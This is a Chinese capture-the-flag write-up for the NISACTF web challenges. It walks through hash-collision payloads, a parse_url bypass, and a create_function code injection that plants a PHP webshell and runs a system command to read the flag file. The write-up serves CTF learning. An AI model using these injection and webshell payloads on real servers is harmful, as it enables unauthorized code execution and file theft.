NISACTF_WriteUp [1]

kinnisoy
165 阅读2分钟

本文已参与 「新人创作礼」 活动,一起开启掘金创作之路。

WriteUp

@[toc]

WEB

checkin

题目请添加图片描述 以为白给题,结果输入不对,f12查看源码。发现一些奇怪的东西: 在这里插入图片描述down了源码,本地打开复制‮⁦Ugeiwo⁩⁦cuishiyuan 在这里插入图片描述

Payload:

http://120.27.195.236:28990/?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6%20Flag!%E2%81%A9%E2%81%A6N1SACTF

level-up

第一关:什么都没有,查看源码,发现disallow,直接访问robots.txt,来到第二关。 在这里插入图片描述 在这里插入图片描述

第二关:md5相等绕过,网上找找MD5碰撞的字符串 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3yqW6gpl-1648434574780)(2022-03-27-19-34-48.png)]

payload

array1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&array2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JWjFfORC-1648434574781)(2022-03-27-19-49-25.png)]

hash碰撞样例https://blog.csdn.net/cosmoslin/article/details/120973888 第三关:sha1碰撞,和上面一样 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kGxxEKzY-1648434574783)(2022-03-27-19-50-50.png)]

payload

array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&
array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LQBUUxIW-1648434574786)(2022-03-27-19-52-29.png)]

第四关:需要传入参数NI_SA_,但是正则匹配不允许上传_,.,(空格),所以需要绕过正则。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X7SEAU9H-1648434574787)(2022-03-27-19-53-21.png)]

百度一下parse_url, url_scheme:@host[:port]][/path][?query][#fragment] 查到这里,发现需要在path前面多加两条/,即可让query匹配不到正确参数。 payload

http://120.27.195.236:28991///level_level_4.php?NI_SA_=txw4ever

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BD18PD7z-1648434574789)(2022-03-27-20-04-11.png)]

第五关:终于到最后一关了,orz.... 看一下正则/^[a-z0-9_]*$/isD的意思:

/i不区分大小写 /s匹配任何不可见字符,包括空格、制表符、换页符等等,等价于[\f\n\r\t\v] /D如果使用$限制结尾字符,则不允许结尾有换行;

那么很显然,所有以数字,字母,下划线等开头的value都会被过滤,我们无法进入下面的.这里有一种bypass方式,在变量前面就上%5c即可。 使用第一个变量传递函数名,第二个变量传递函数内容来get flag。 函数名使用php官方函数create_function [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5FRqU9NX-1648434574790)(2022-03-27-20-06-13.png)] 测试函数执行1: ?a=%5ccreate_function&b=return%222333%22;}phpinfo();/*上传后,函数为

create_function_anonymous(){
    return"2333";}
    phpinfo();
    /*}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xetBqp4F-1648434574791)(2022-03-27-20-31-44.png)]

上传一句话木马:b= return "2333";}eval($_REQUEST['kinnisoy']);/* 遍历目录: a=%5ccreate_function&b=return%222333%22;}eval($_REQUEST[%27kinnisoy%27]);/*&kinnisoy=var_dump(scandir(%27./%27)); 到这层时,发现flag文件,cat读取即可。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0dkgFron-1648434574793)(2022-03-27-20-37-41.png)]

最终payload

/55_5_55.php?a=%5ccreate_function&b=return%222333%22;}eval($_REQUEST[%27kinnisoy%27]);/*&kinnisoy=system(%27cat%20../../../flag%27);
avatar
文章
阅读
粉丝